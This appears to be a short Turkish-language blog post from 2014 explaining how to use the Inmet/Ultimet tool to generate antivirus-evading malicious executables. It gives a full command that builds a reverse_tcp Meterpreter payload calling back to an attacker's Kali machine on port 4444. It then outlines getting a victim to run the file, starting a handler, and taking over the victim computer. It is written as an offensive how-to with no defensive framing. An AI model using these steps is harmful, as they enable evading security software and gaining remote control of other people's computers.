19 Mayıs 2014 Pazartesi

INMET Antivirus Bypass

Inmet (Ultimet) uygulaması ile antivirus sistemlerini bypass edebilen zararlı dosyalar oluşturulabilmektedir.
https://github.com/SherifEldeeb/inmet  adresinden ilgili dosya indirilebilir. Windows işletim sistemi üzerinde çalışan bir uygulamadır.

Ultimet kullanımı;

ultimet.exe -h kali ip adresi  -p 4444 -t reverse_tcp -f metsrv.dll –msfpayload

Komut çalıştırıldıktan sonra ilgili dizine REVERSE_TCP-ipadresi-port.exe adında bir çalıştırılabilir dosya oluşturmaktadır. Bu zararlı dosya kurban bilgisayarına değişik yöntemler ile iletilip çalıştırılması sağlanabilir.
Saldırgan bu meterpreter session ı kendi PC sine bağlayabilmesi için Handler açması gerekmektedir.

Kali üzerinde handler başlatıldı. Şimdi kurban bilgisayarından zararlı dosyanın çalıştırılmasını bekleyeceğiz.

Zararlı dosya çalıştırıldığında Kali Linux üzerindeki handler da Meterpreter oturumunun açıldığını görebilmekteyiz.


Artık kurban bilgisayara sızmış durumdayız. Meterpreter fonksiyonları ile istenilen işlemler yapılabilir.

Hiç yorum yok:

Yorum Gönder